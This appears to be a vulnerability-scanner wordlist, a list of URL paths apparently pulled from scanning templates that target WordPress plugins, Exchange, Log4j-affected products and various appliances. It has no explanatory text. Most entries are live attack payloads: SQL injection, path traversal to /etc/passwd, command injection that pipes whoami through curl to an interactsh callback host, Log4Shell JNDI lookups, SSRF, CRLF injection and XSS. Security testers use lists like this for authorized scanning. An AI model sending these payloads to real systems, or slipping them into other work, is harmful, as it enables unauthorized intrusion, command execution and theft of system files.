/Schemas/$%7B
/php/ping.php?hostname=|dir
/ui/vropspluginui/rest/services/getstatus
/users/sign_in
/wp-content/plugins/tutor/readme.txt
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/filebird/readme.txt
/wp-content/plugins/polls-widget/readme.txt
/wp1/home-18/?qtproxycall=https://oast.me
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5(
/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)
/wp-content/plugins/wc-multivendor-marketplace/readme.txt
/wp-content/plugins/registrations-for-the-events-calendar/readme.txt
/wp-content/plugins/wpdatatables/readme.txt
/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0
/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/prweb/PRAuth/app/default/
/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css
/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css
/?url=http://0177.0.0.1/server-status
/?host=http://0177.0.0.1/server-status
/?file=http://0177.0.0.1/etc/passwd
/global-protect/login.esp
/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0
/admin/elfinder/elfinder-cke.html
/assets/backend/elfinder/elfinder-cke.html
/assets/elFinder-2.1.9/elfinder.html
/assets/elFinder/elfinder.html
/backend/elfinder/elfinder-cke.html
/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder.html
/uploads/elfinder/elfinder-cke.html
/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/service/v1/service-details
/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;
/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/api/get_device_details
/openam/oauth2/..;/ccversion/Version
/oam/server/opensso/sessionservice
/wp-content/plugins/ulisting/README.txt
/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-
/?unix:{{repeat(
/about_state
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/homeaction.php
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
/wan.htm
/index.php?login_user={{login_user}}&time={{time}}&token={{token}}
/RestAPI/ImportTechnicians
/goforms/menu
/Side.php
/lab.html?vpath=//interact.sh
/ddns_check.ccp
/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/api/ping/;`id`
/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d
/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost
/wp-content/plugins/wp-statistics/readme.txt
/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/api/experimental/patternfile?order=id%3Bselect(md5(
/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;
/api/snapshots/:key
/api/geojson?url=file:/etc/passwd
/api/geojson?url=file:///etc/passwd
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/lab.html?vpath=//example.com
/apply.cgi
/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
/user/error
/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D
